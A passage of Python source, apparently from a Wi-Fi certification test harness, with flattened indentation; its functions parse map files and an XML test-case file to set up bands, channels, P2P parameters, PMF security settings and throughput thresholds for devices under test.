PASS(1)/Fail(-1) : int
"""
global ProgName
iCount = 1
LogMsg("Read Testbed Subscription Server Info Function")
if dutInfoObject.DUTEAPMethod == "TLS":
tag = "TLS"
else:
tag = "Other"
subsServerName = find_SubsServer(TestCaseID, tag)
setattr(testEnvVariables, "SS%s" % (iCount), subsServerName)
VarList.setdefault("SS%s_control_agent" %(iCount), "wfa_control_agent_%s_osu" % (subsServerName.lower()))
VarList.setdefault("SS%s" % (iCount), "%s" % (subsServerName.lower()))
return 1
def ReadMapFile(filename, index, delim):
"""
Reads the MapFile of format
Param1<delim>value1<delim>Param2<delim>value2<delim>
based on given Index,Delim and returns the value.
Parameters
----------
filename : str
index : str
delim : str
occurs nth instance of index
Returns
-------
Value/Fail(-1) : str
"""
iCount = 1
returnString = -1
if os.path.exists(filename) == 0:
LogMsg("File not found - %s" % filename)
return -1
LogMsg("ReadMapFile ------- %s-%s-%s" % (filename, index, delim))
fileP = open(filename, 'r')
for l in fileP.readlines():
if not l: break
line = l.split('#')
command = line[0].split(delim)
if index in command:
returnString = command[command.index(index)+1]
break
fileP.close()
return returnString
def ReadAllMapFile(filename, index, delim):
"""
Reads all the MapFile of format
Param1<delim>value1<delim>Param2<delim>value2<delim>
based on given Index,Delim and returns the value.
Parameters
----------
filename : str
index : str
delim : str
occurs nth instance of index
Returns
-------
Value/Fail(-1) : str
"""
iCount = 1
returnString = -1
if os.path.exists(filename) == 0:
LogMsg("File not found - %s" % filename)
return -1
LogMsg("Read All MapFile ------- %s-%s-%s" % (filename, index, delim))
fileP = open(filename, 'r')
for l in fileP.readlines():
if not l: break
line = l.split('#')
if delim in line[0]:
command = line[0].split(delim)
if returnString == -1:
returnString = "%s,%s%s" % (command[0], command[1], delim)
else:
returnString = "%s%s,%s%s" % (returnString, command[0], command[1], delim)
fileP.close()
return returnString
def GetAPPortNumber(APName):
"""
Gets the power switch port number for given AP
Parameters
----------
APName : str
Returns
-------
Port Number/Fail(-1) : str
"""
return ReadMapFile(uccPath+TestbedAPFile, "%s%s" % (APName, "APPowerSwitchPort"), "!")
def GetAPIPAddress(APName):
"""
Gets the IP Address of given AP
Parameters
----------
APName : str
Returns
-------
IP Address/Fail(-1) : str
"""
if ReadMapFile(uccPath+TestbedAPFile, "%s%s" % (APName, "APIPAddress"), "!") != -1:
return ReadMapFile(uccPath+TestbedAPFile, "%s%s" % (APName, "APIPAddress"), "!").split(' ')[0]
else:
return -1
def AddTestCaseAP(APName, pos):
"""
Gets the IP Address of given AP
Parameters
----------
APName : str
pos : int
position in list
Returns
-------
Pass(1)/Fail(-1) : int
"""
try:
setattr(testEnvVariables.APs[APName], "Number", pos)
setattr(testEnvVariables.APs[APName], "State", "On")
return 1
except:
LogMsg("Invalid AP Name")
return -1
def GetOtherVariables(TID):
global dutInfoObject
if getattr(dutInfoObject, "ASD") > "0":
find_ASD_threshold_values(TID, "Throughputs_ASD")
else:
find_throughput_values(TID, "Throughputs")
cw = find_TestcaseInfo_Level1(TID, "APChannelWidth")
LogMsg("Channel Width = %s" % cw)
if cw != "":
VarList.setdefault("APChannelWidth", cw)
if ProgName == "PMF":
#Security get parameters
findSecurity(TID, "Security")
#PMF Capability get parameters
findPMFCap(TID, "PMFCapability")
if "PMF-4" in TID:
VarList.setdefault("sender", "sta")
if "PMF-5" in TID:
VarList.setdefault("sender", "ap")
#WLAN Tester for frame injection-sniffing
cond = find_TestcaseInfo_Level1(TID, "WFA_Tester")
VarList.setdefault("WFA_Tester", cond)
VarList.setdefault("TBAPConfigServer", "TestbedAPConfigServer")
VarList.setdefault("WFA_Sniffer", "wfa_sniffer")
VarList.setdefault("WFA_TEST_control_agent", "wfa_test_control_agent")
combo = find_TestcaseInfo_Level1(TID, "QualCombinationInfo")
LogMsg("Combination Info = %s" % combo)
if combo != "":
VarList.setdefault("QualCombinationInfo", combo)
# MIMO Related Checks
VarList.setdefault("ChannelWidth_Value", dutInfoObject.SupportedChannelWidth)
VarList.setdefault("GreenField_Value", dutInfoObject.Greenfield)
VarList.setdefault("SGI20_Value", dutInfoObject.SGI20)
VarList.setdefault("SGI40_Value", dutInfoObject.SGI40)
VarList.setdefault("MCS_Set_Value", dutInfoObject.Streams)
VarList.setdefault("MCS32_Value", dutInfoObject.MCS32)
VarList.setdefault("STBC_RX_Value", dutInfoObject.STBC_RX)
VarList.setdefault("STBC_TX_Value", dutInfoObject.STBC_TX)
VarList.setdefault("STAUT_PM", dutInfoObject.STAUT_PM)
VarList.setdefault("BSS_Trans_Query_Support", dutInfoObject.BSS_Trans_Query_Support)
VarList.setdefault("TSM_Support", dutInfoObject.TSM_Support)
VarList.setdefault("Streams", "%sSS" % dutInfoObject.Streams)
VarList.setdefault("Open_Mode", dutInfoObject.Open_Mode)
VarList.setdefault("Mixedmode_WPA2WPA", dutInfoObject.Mixedmode_WPA2WPA)
VarList.setdefault("PMF_OOB", dutInfoObject.PMF_OOB)
VarList.setdefault("ASD", dutInfoObject.ASD)
VarList.setdefault("AC_VO", dutInfoObject.AC_VO)
VarList.setdefault("AC_VI", dutInfoObject.AC_VI)
VarList.setdefault("AC_BE", dutInfoObject.AC_BE)
VarList.setdefault("AC_BK", dutInfoObject.AC_BK)
if ProgName == "N":
VarList.setdefault("WTS_ControlAgent_Support", dutInfoObject.WTSSupport)
VarList.setdefault("WTS_TrafficAgent_Support", dutInfoObject.WTSTrafficSupport)
#Check for 11n Optional Test Cases Flag
FindCheckFlag11n(TID)
#TDLS specific conditional step
cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-DiscReq")
if cond != "":
if dutInfoObject.TDLSDiscReq == "1":
VarList.setdefault("ConditionalStep-DiscReq", cond)
else:
VarList.setdefault("ConditionalStep-DiscReq", "DoNothing.txt")
cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-PUSleep")
if cond != "":
if dutInfoObject.PUSleepSTA == "1":
VarList.setdefault("ConditionalStep-PUSleep", cond)
else:
VarList.setdefault("ConditionalStep-PUSleep", "DoNothing.txt")
#Check for conditional step
cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-Aonly-40")
if cond != "":
if re.search('A', dutInfoObject.DUTBand) and dutInfoObject.SupportedChannelWidth == "40":
VarList.setdefault("ConditionalStep-Aonly-40", cond)
else:
VarList.setdefault("ConditionalStep-Aonly-40", "DoNothing.txt")
cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-2SS")
if cond != "":
if dutInfoObject.Streams == "3" or dutInfoObject.Streams == "2":
VarList.setdefault("ConditionalStep-2SS", cond)
else:
VarList.setdefault("ConditionalStep-2SS", "DoNothing.txt")
cond = find_TestcaseInfo_Level1(TID, "ConditionalStep-3SS")
if cond != "":
if dutInfoObject.Streams == "3":
VarList.setdefault("ConditionalStep-3SS", cond)
else:
VarList.setdefault("ConditionalStep-3SS", "DoNothing.txt")
#Check for Special Stream
cond = find_TestcaseInfo_Level1(TID, "TX-SS")
if cond != "":
VarList.setdefault("TX-SS", cond)
#Check for Special Stream
cond = find_TestcaseInfo_Level1(TID, "RX-SS")
if cond != "":
VarList.setdefault("RX-SS", cond)
AddVariableInit(TID, "STA_Frag", "2346")
AddVariableInit(TID, "STA_Legacy_PS", "off")
AddVariableInit(TID, "STA2_Legacy_PS", "off")
AddVariableInit(TID, "HTFlag", "on")
AddVariableInit(TID, "WMMFlag", "off")
AddVariableInit(TID, "CheckFlag11n", "off")
#TDLS specific
AddVariableInit(TID, "CheckFlag11n", "off")
AddVariableInit(TID, "Offch", "44")
AddVariableInit(TID, "Offchwidth", "20")
VarList.setdefault("DUTSupportedCW", dutInfoObject.SupportedChannelWidth)
find_stream_threshold_values(TID, "WMMStreamThreshold")
def AddVariableInit(TID, VarName, VarDefault):
VarValue = find_TestcaseInfo_Level1(TID, VarName)
if VarValue != "":
VarList.setdefault(VarName, VarValue)
else:
VarList.setdefault(VarName, VarDefault)
def FindCheckFlag11n(TestCaseID):
"""
Finds the 11n optional test case flags and decides whether
test case should be executed or not
Parameters
----------
TestCaseID : str
Returns
-------
Pass/Fail : str
"""
global dutInfoObject
chkFlag = find_TestcaseInfo_Level1(TestCaseID, "CheckFlag11n")
LogMsg("%s is check flag" % chkFlag)
if chkFlag == "":
LogMsg("Options Check for 11n not required for test case %s" % TestCaseID)
elif getattr(dutInfoObject, chkFlag) == "0":
LogMsg("%s not supported by DUT; Skipping the Test." % chkFlag)
VarList.setdefault("TestNA", "%s not supported by DUT; Skipping the Test. Re-Check the file \"DUTInfo.txt\"" % chkFlag)
else:
LogMsg("%s is supported by DUT; Make sure [%s] is enabled" % (chkFlag, chkFlag))
for EAP in EAPList:
if EAP == chkFlag:
dutInfoObject.__setattr__("DUTEAPMethod", EAP)
VarList.setdefault("DUTEAPMethod", dutInfoObject.DUTEAPMethod)
LogMsg("%s EAP method is supported by DUT" % chkFlag)
break
def AddWPSConfigMethod(TID, VarName, VarValue):
DUTFile = uccPath+DUTInfoFile
dut_wps_support = ReadMapFile(DUTFile, VarValue, "!")
if int(dut_wps_support) != 1:
for m in WPSConfigList:
if int(ReadMapFile(DUTFile, m, "!")) == 1:
VarValue = m
break
VarList.setdefault(VarName, VarValue)
# For P2P Parameters
def GetP2PVariables(TID):
global ProgName
oper_chn = -1
list_chn = -1
intent_val = -1
serv_pref = -1
if ProgName == "WFD":
FindBandOperChannel(TID)
else:
oper_chn = find_TestcaseInfo_Level1(TID, "OperatingChannel")
if oper_chn != "":
VarList.setdefault("OPER_CHN", oper_chn)
if ProgName == "WFDS":
serv_pref = find_TestcaseInfo_Level1(TID, "ServicePref")
if serv_pref != "":
VarList.setdefault("WfdsTestServicePref", serv_pref)
list_chn = find_TestcaseInfo_Level1(TID, "ListenChannel")
if list_chn != "":
VarList.setdefault("LISTEN_CHN", list_chn)
intent_val = find_TestcaseInfo_Level1(TID, "IntentValue_DUT")
if intent_val != "":
VarList.setdefault("INTENT_VAL_DUT", intent_val)
intent_val = find_TestcaseInfo_Level1(TID, "IntentValue_STA")
if intent_val != "":
VarList.setdefault("INTENT_VAL_STA", intent_val)
AddVariableInit(TID, "PERSISTENT", 0)
AddVariableInit(TID, "SERDISC", 0)
wps_method = find_TestcaseInfo_Level1(TID, "WPS_Config")
if wps_method != "":
AddWPSConfigMethod(TID, "DUT_WPS_METHOD", wps_method)
def FindBandOperChannel(TestCaseID):
"""
Finds the band and Operating channel required for given test case
and puts them into testEnvVariables
Parameters
----------
TestCaseID : str
Returns
-------
testOperChannel : int
"""
global ProgName
LoadBandSelection()
band = -1
operchannel1 = []
testOperChannel = []
Band = find_TestcaseInfo_Level1(TestCaseID, "Band")
if Band == "A/G":
Band = "AG"
if Band == "A/G/N":
Band = "AGN"
if Band == "G/N":
Band = "GN"
if Band == "A/N":
Band = "AN"
if Band == "A/B":
Band = "AB"
try:
band = bandSelectionList["%s:%s" % (Band, dutInfoObject.DUTBand)]
except KeyError:
LogMsg("Invalid band information %s" % Band)
operChannel1 = find_TestcaseInfo_Level1(TestCaseID, "OperatingChannel").split(",")
if operChannel1[0] == "":
return
for chan in range(0, len(operChannel1)):
operchannel1.append(operChannel1[chan].split("/"))
LogMsg("Test case Operating Channel %s %s" % (operchannel1[chan][0], operchannel1[chan][1]))
if band != "11a" and band != "11na" and band != -1:
testOperChannel.append(operchannel1[chan][1])
elif band != -1:
testOperChannel.append(operchannel1[chan][0])
if band == -1 and ProgName != "P2P":
VarList.setdefault("TestNA", "Invalid Band. DUT Capable Band is [%s] and Test requires [%s]" % (dutInfoObject.DUTBand, Band))
LogMsg("Test execution in %s Band and Operating Channel %s" % (band, testOperChannel))
setattr(testEnvVariables, "Band", band)
iCount = 1
for chan in testOperChannel:
if len(testOperChannel) > 1:
VarList.setdefault("OPER_CHN_%s"%(iCount), chan)
iCount = iCount + 1
VarList.setdefault("OPER_CHN", OPER_CHN_1)
else:
VarList.setdefault("OPER_CHN", chan)
return testOperChannel
def FindBandChannel(TestCaseID):
"""
Finds the band and channel required for given test case
and puts them into testEnvVariables
Parameters
----------
TestCaseID : str
Returns
-------
testChannel : int
"""
global ProgName
LoadBandSelection()
band = -1
channel1 = []
testChannel = []
DUTBAND = "%s" % dutInfoObject.DUTBand
Band = find_TestcaseInfo_Level1(TestCaseID, "Band")
if Band == "A/G":
Band = "AG"
if Band == "A/G/N":
Band = "AGN"
if Band == "G/N":
Band = "GN"
if Band == "A/N":
Band = "AN"
if Band == "A/B":
Band = "AB"
if Band == "AC":
Band = "AC"
if Band == "AD":
Band = "AD"
try:
band = bandSelectionList["%s:%s" % (Band, dutInfoObject.DUTBand)]
except KeyError:
LogMsg("Invalid band information %s" % Band)
Channel1 = find_TestcaseInfo_Level1(TestCaseID, "Channel").split(",")
if Channel1[0] == "":
return
for chan in range(0, len(Channel1)):
channel1.append(Channel1[chan].split("/"))
LogMsg("Test case Channel %s %s" % (channel1[chan][0], channel1[chan][1]))
if band == "11ad":
testChannel.append(channel1[chan][2])
elif band != "11a" and band != "11na" and band != "11ac" and band != -1:
testChannel.append(channel1[chan][1])
elif band != -1:
testChannel.append(channel1[chan][0])
elif band == -1 and ProgName != "P2P":
VarList.setdefault("TestNA", "Invalid Band. DUT Capable Band is [%s] and Test requires [%s]" % (dutInfoObject.DUTBand, Band))
else:
LogMsg("band = %s and ProgName = %s" % (band,ProgName))
LogMsg("Test execution in %s Band and Channel %s" % (band, testChannel))
if band == "11a" or band == "11g":
VarList.setdefault("STAPHY", "ag")
elif band == "11b":
VarList.setdefault("STAPHY", "b")
elif band == "11na" or band == "11ng":
VarList.setdefault("STAPHY", "11n")
elif band == "11ac":
VarList.setdefault("STAPHY", "11ac")
elif band == "11ad":
VarList.setdefault("STAPHY", "11ad")
# APUT Band for 11n
if int(testChannel[0]) > 35:
if band == "11ac":
VarList.setdefault("APUT_Band", "11ac")
VarList.setdefault("STAUT_Band", "11ac")
VarList.setdefault("Band_Legacy", "11a")
VarList.setdefault("Band_LegacyN", "11na")
else:
if DUTBAND == "AN" or DUTBAND == "ABGN":
VarList.setdefault("APUT_Band", "11na")
VarList.setdefault("STAUT_Band", "11na")
VarList.setdefault("Band_Legacy", "11a")
elif DUTBAND == "A" or DUTBAND == "ABG":
VarList.setdefault("APUT_Band", "11a")
VarList.setdefault("STAUT_Band", "11a")
VarList.setdefault("Band_Legacy", "11a")
else:
if DUTBAND == "GN" or DUTBAND == "ABGN":
VarList.setdefault("APUT_Band", "11ng")
VarList.setdefault("STAUT_Band", "11ng")
VarList.setdefault("Band_Legacy", "11g")
elif DUTBAND == "BG" or DUTBAND == "ABG":
VarList.setdefault("APUT_Band", "11g")
VarList.setdefault("STAUT_Band", "11g")
VarList.setdefault("Band_Legacy", "11g")
elif DUTBAND == "B":
VarList.setdefault("APUT_Band", "11b")
VarList.setdefault("STAUT_Band", "11b")
VarList.setdefault("Band_Legacy", "11b")
elif DUTBAND == "AD":
VarList.setdefault("APUT_Band","11ad")
VarList.setdefault("STAUT_Band","11ad")
VarList.setdefault("PCPUT_Band","11ad")
setattr(testEnvVariables, "Band", band)
iCount = 1
for chan in testChannel:
if len(testChannel) > 1:
setattr(testEnvVariables, "Channel_%s" % (iCount), chan)
iCount = iCount + 1
setattr(testEnvVariables, "Channel", testEnvVariables.Channel_1)
else:
setattr(testEnvVariables, "Channel", chan)
LogMsg("%s %s %s" %(testEnvVariables.Channel_1, testEnvVariables.Channel_2, testEnvVariables.Channel_3))
return testChannel
def LoadBandSelection():
"""Init band selection array"""
#Testcase Band : DUT Band
#DUT Mode BG
bandSelectionList.setdefault("A:BG", "11g")
bandSelectionList.setdefault("B:BG", "11b")
bandSelectionList.setdefault("G:BG", "11g")
bandSelectionList.setdefault("AG:BG", "11g")
bandSelectionList.setdefault("AB:BG", "11b")
#DUT Mode A only
bandSelectionList.setdefault("A:A", "11a")
bandSelectionList.setdefault("B:A", "11a")
bandSelectionList.setdefault("G:A", "11a")
bandSelectionList.setdefault("AG:A", "11a")
bandSelectionList.setdefault("AB:A", "11a")
#DUT Mode ABG
bandSelectionList.setdefault("A:ABG", "11a")
bandSelectionList.setdefault("B:ABG", "11b")
bandSelectionList.setdefault("G:ABG", "11g")
bandSelectionList.setdefault("AG:ABG", "11a")
bandSelectionList.setdefault("AB:ABG", "11a")
#DUT Mode b only
bandSelectionList.setdefault("A:B", "11g")
bandSelectionList.setdefault("B:B", "11b")
bandSelectionList.setdefault("G:B", "11g")
bandSelectionList.setdefault("AG:B", "11g")
bandSelectionList.setdefault("AB:B", "11b")
#DUT Mode G only
bandSelectionList.setdefault("A:G", "11g")
bandSelectionList.setdefault("B:G", "11g")
bandSelectionList.setdefault("G:G", "11g")
bandSelectionList.setdefault("AG:G", "11g")
bandSelectionList.setdefault("AB:G", "11b")
# DUT mode A and b only
bandSelectionList.setdefault("A:AB", "11a")
bandSelectionList.setdefault("B:AB", "11b")
bandSelectionList.setdefault("G:AB", "11b")
bandSelectionList.setdefault("AG:AB", "11b")
bandSelectionList.setdefault("AB:AB", "11a")
#DUT mode ABGN
bandSelectionList.setdefault("A:ABGN", "11a")
bandSelectionList.setdefault("B:ABGN", "11b")
bandSelectionList.setdefault("G:ABGN", "11g")
bandSelectionList.setdefault("AG:ABGN", "11a")
bandSelectionList.setdefault("AB:ABGN", "11a")
bandSelectionList.setdefault("AGN:ABGN", "11na")
bandSelectionList.setdefault("AN:ABGN", "11na")
bandSelectionList.setdefault("GN:ABGN", "11ng")
#DUT mode GN
bandSelectionList.setdefault("A:GN", "11g")
bandSelectionList.setdefault("B:GN", "11b")
bandSelectionList.setdefault("G:GN", "11g")
bandSelectionList.setdefault("AG:GN", "11g")
bandSelectionList.setdefault("AB:GN", "11b")
bandSelectionList.setdefault("AGN:GN", "11ng")
bandSelectionList.setdefault("AN:GN", "11ng")
bandSelectionList.setdefault("GN:GN", "11ng")
#DUT mode AN
bandSelectionList.setdefault("A:AN", "11a")
bandSelectionList.setdefault("B:AN", "11a")
bandSelectionList.setdefault("G:AN", "11a")
bandSelectionList.setdefault("AG:AN", "11a")
bandSelectionList.setdefault("AB:AN", "11a")
bandSelectionList.setdefault("AGN:AN", "11na")
bandSelectionList.setdefault("AN:AN", "11na")
bandSelectionList.setdefault("GN:AN", "11na")
bandSelectionList.setdefault("AGN:ABG", "11a")
bandSelectionList.setdefault("AGN:BG", "11g")
bandSelectionList.setdefault("AGN:B", "11b")
bandSelectionList.setdefault("AN:ABG", "11a")
bandSelectionList.setdefault("AN:BG", "11g")
bandSelectionList.setdefault("AN:B", "11b")
bandSelectionList.setdefault("GN:ABG", "11g")
bandSelectionList.setdefault("GN:BG", "11g")
bandSelectionList.setdefault("GN:B", "11b")
# DUT Mode AC
bandSelectionList.setdefault("A:AC", "11a")
bandSelectionList.setdefault("AN:AC", "11na")
bandSelectionList.setdefault("AC:AC", "11ac")
bandSelectionList.setdefault("B:BGNAC", "11b")
bandSelectionList.setdefault("BG:BGNAC", "11g")
bandSelectionList.setdefault("BGN:BGNAC", "11ng")
bandSelectionList.setdefault("AD:AD", "11ad")
def find_TestcaseInfo_Level1(testID, tag):
"""
Finds the value of given tag in master XML file of Testcase Info
Parameters
----------
testID : str
tag : str
Returns
-------
result : int
tag value as per XML file
"""
result = ""
LogMsg("\n|\n|\n| Searching %s for TestID %s" % (tag, testID))
for node in doc.getElementsByTagName(testID):
L = node.getElementsByTagName(tag)
for node2 in L:
for node3 in node2.childNodes:
if node3.nodeType == Node.TEXT_NODE:
result = node3.nodeValue
LogMsg("\n|\n|\n| Found %s = %s" %(tag, result))
return result
LogMsg("\n|\n|\n| Found %s = %s" % (tag, result))
return result
def check_isNode_Level1(tag):
result = 0
LogMsg("\n|\n|\n| Searching for Node %s" % tag)
for node in doc.getElementsByTagName(tag):
LogMsg("Node exsits")
result = 1
L = node.getElementsByTagName(tag)
LogMsg(" Match for %s = %s" %(tag, result))
return result
def find_STAFile(testID, tag):
result = ""
LogMsg("\n|\n|\n| Searching DUT File for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
L = node.getElementsByTagName(tag)
LogMsg("Node1 = %s" % node.nodeName)
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == "_Value":
LogMsg('--------Found %s' % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
else:
LogMsg("--------Node3 = %s" % node3.nodeName)
if node3.nodeName == "WPA2-Personal" and node3.nodeName == dutInfoObject.DUTType:
LogMsg("------------Node4 Personal= %s" % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
elif node3.nodeName == "WPA2-Enterprise" and node3.nodeName == dutInfoObject.DUTType:
for node4 in node3.childNodes:
LogMsg("------------Node4. = %s" % node4.nodeName)
for node5 in node4.childNodes:
if node5.nodeName == dutInfoObject.DUTEAPMethod:
LogMsg("------------Node5. = %s" %node5.firstChild.nodeValue)
result = node5.firstChild.nodeValue
if result == "NA":
LogMsg("\n The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
VarList.setdefault("TestNA", "The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
LogMsg("\n|\n|\n| Found DUT File -%s-" % (result))
return result
def find_TestbedFile(testID):
result = ""
LogMsg("\n|\n|\n| Searching Testbed File for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
L = node.getElementsByTagName("TestbedFile")
LogMsg("Node1 = %s" % node.nodeName)
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == "_Value":
LogMsg('--------Found %s' % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
if node3.nodeType == Node.TEXT_NODE and node3.nodeValue.isalnum() == True:
LogMsg('--------Found -%s-' % node3.nodeValue)
if node3.nodeValue == '0':
continue
else:
result = node3.nodeValue
break
else:
LogMsg("--------Node3 = %s" % node3.nodeName)
if node3.nodeName == dutInfoObject.DUTType:
LogMsg("------------Node4 = %s" % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
if result == "NA":
LogMsg("\n The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
VarList.setdefault("TestNA", "The test %s is not applicable for DUT Type %s" % (testID, dutInfoObject.DUTType))
LogMsg("\n|\n|\n| Found Testbed File -%s-" % (result))
return result
def find_Supplicant(testID, tag, category):
result = ""
LogMsg("\n|\n|\n| Searching Supplicant for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
L = node.getElementsByTagName("Supplicant")
LogMsg("Node1 = %s" %node.nodeName)
L = L[0].getElementsByTagName(tag)
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == category:
LogMsg("------------Node4 Personal= %s" %node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
if result == "NA":
LogMsg("\n The test %s is not applicable for DUT category %s" % (testID, category))
VarList.setdefault("TestNA", "The test %s is not applicable for DUT category %s" % (testID, category))
break
LogMsg("\n|\n|\n| Found Supplicant -%s-" % (result))
return result
def find_Server(testID, tag):
result = ""
LogMsg("\n|\n|\n| Searching Server for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" % node.nodeName)
L = node.getElementsByTagName("Server")
for node2 in L:
LogMsg("----Node2 = %s" %node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == tag:
LogMsg("------------Node4 = %s" %node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
LogMsg("\n|\n|\n| Found server File -%s-" % (result))
return result
def find_SubsServer(testID, tag):
result = ""
LogMsg("\n|\n|\n| Searching Subscription Server for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" % node.nodeName)
L = node.getElementsByTagName("SubscriptionServer")
for node2 in L:
LogMsg("----Node2 = %s" %node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == tag:
LogMsg("------------Node4 = %s" %node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
LogMsg("\n|\n|\n| Found Subscription server File -%s-" % (result))
return result
#PMF specific
def find_WLANTestFile(testID, tag):
result = ""
LogMsg("\n|\n|\n| Searching WLAN Tester File for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" % node.nodeName)
L = node.getElementsByTagName(tag)
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == "_Value":
LogMsg("------------Node4 = %s" % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
break
LogMsg("\n|\n|\n| Found WLAN Tester File -%s-" % (result))
return result
def findSecurity(testID, tag):
result = ""
LogMsg("\n|\n|\n| Searching Security Info for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" %node.nodeName)
L = node.getElementsByTagName(tag)
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == "KeyMgmt":
LogMsg("------------Security Info= %s" % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
if result == "WPA2-Ent":
if dutInfoObject.DUTType == "WPA2-Enterprise":
VarList.setdefault("Keymgnt", node3.firstChild.nodeValue)
VarList.setdefault("keymgmttpye", "%s" % ("WPA2"))
else:
VarList.setdefault("Keymgnt", "%s" % ("WPA2-PSK"))
VarList.setdefault("keymgmttpye", "%s" % ("WPA2"))
else:
VarList.setdefault("Keymgnt", "%s-%s" % (node3.firstChild.nodeValue, "PSK"))
VarList.setdefault("keymgmttpye", node3.firstChild.nodeValue)
elif node3.nodeName == "Encryption":
LogMsg("------------Security Info= %s" % node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
VarList.setdefault("encpType", node3.firstChild.nodeValue)
elif node3.nodeName == "Passphrase":
LogMsg("------------Security Info= %s" %node3.firstChild.nodeValue)
result = node3.firstChild.nodeValue
VarList.setdefault("passphrase", node3.firstChild.nodeValue)
LogMsg("\n|\n|\n| Found Security Info -%s-" % (result))
def findPMFCap(testID, tag):
result = ""
LogMsg("\n|\n|\n| Searching PMF Capability for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" % node.nodeName)
L = node.getElementsByTagName(tag)
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == "DUT_PMFCap":
LogMsg("------------DUT PMF Cap= %s" % node3.firstChild.nodeValue)
VarList.setdefault("DUT_PMFCap", node3.firstChild.nodeValue)
elif node3.nodeName == "PMFCap1":
LogMsg("------------Testbed PMF Cap1= %s" % (node3.firstChild.nodeValue))
VarList.setdefault("PMFCap1", node3.firstChild.nodeValue)
elif node3.nodeName == "PMFCap2":
LogMsg("------------Testbed PMF Cap2= %s" % (node3.firstChild.nodeValue))
VarList.setdefault("PMFCap2", node3.firstChild.nodeValue)
elif node3.nodeName == "PMFCap3":
LogMsg("------------Testbed PMF Cap3= %s" % (node3.firstChild.nodeValue))
VarList.setdefault("PMFCap3", node3.firstChild.nodeValue)
def get_ASD_framerate(ASDvalue):
# The expected traffic is about 30% more than the expected throughput value
offset = 0.3
# payload value is 1000, which is hard-coded in the script
ASDframerate = ((float(ASDvalue) * (1+offset) * 1000000) / (1000 * 8))
ASDframerate = "{:.2f}".format(ASDframerate)
return ASDframerate
def find_ASD_threshold_values(testID, tag):
result = ""
tag1 = ""
LogMsg("\n|\n|\n| Searching ASD Throughput values for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" % node.nodeName)
L = node.getElementsByTagName(tag)
asd_type = getattr(dutInfoObject, "ASD")
if asd_type == "1":
tag1 = "Handsets"
elif asd_type == "2":
tag1 = "TV"
elif asd_type == "3":
tag1 = "Printer"
elif asd_type == "4":
tag1 = "SetTopBox"
elif asd_type == "5":
tag1 = "MobileAP"
elif asd_type == "6":
tag1 = "Audio"
elif asd_type == "7":
tag1 = "NwCamera"
elif asd_type == "8":
tag1 = "ClientCard"
LogMsg(" Test Running ASD -%s-%s- " % (asd_type, tag1))
for node2 in L:
for node3 in node2.childNodes:
if node3.nodeName == tag1:
for node4 in node3.childNodes:
if node4.nodeName != "#text":
LogMsg("------------Node4. = %s %s" % (node4.nodeName, node4.firstChild.nodeValue))
VarList.setdefault(node4.nodeName, node4.firstChild.nodeValue)
#Add new key value in the Varlist dictionary to store coresponding framerate for ASD project
ASDkey = "FrameRate_" + node4.nodeName
ASDframerate = get_ASD_framerate(node4.firstChild.nodeValue)
VarList.update({ASDkey:ASDframerate})
result = 1
LogMsg("\n|\n|\n| Found ASD Throughput values -%s-" % (result))
return result
def find_throughput_values(testID, tag):
result = ""
tag1 = ""
LogMsg("\n|\n|\n| Searching Throughput values for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
LogMsg("Node1 = %s" % node.nodeName)
L = node.getElementsByTagName(tag)
bnd = getattr(testEnvVariables, "Band")
if bnd == "11a" or bnd == "11na":
tag1 = "A"
elif bnd == "11g" or bnd == "11ng":
tag1 = "G"
elif bnd == "11b":
tag1 = "B"
elif bnd == "11ac":
tag1 = "AC"
LogMsg(" Test Running in band -%s-%s- " % (bnd, tag1))
for node2 in L:
LogMsg("----Node2 = %s" % node2.nodeName)
for node3 in node2.childNodes:
if node3.nodeName == tag1:
for node4 in node3.childNodes:
if node4.nodeName != "#text":
LogMsg("------------Node4. = %s %s" % (node4.nodeName, node4.firstChild.nodeValue))
VarList.setdefault(node4.nodeName, node4.firstChild.nodeValue)
result = 1
LogMsg("\n|\n|\n| Found Throughput values -%s-" % (result))
return result
def find_stream_threshold_values(testID, tag):
result = ""
tag1 = ""
LogMsg("\n|\n|\n| Searching WMM Stream Thrshold values for TestID %s" % (testID))
for node in doc.getElementsByTagName(testID):
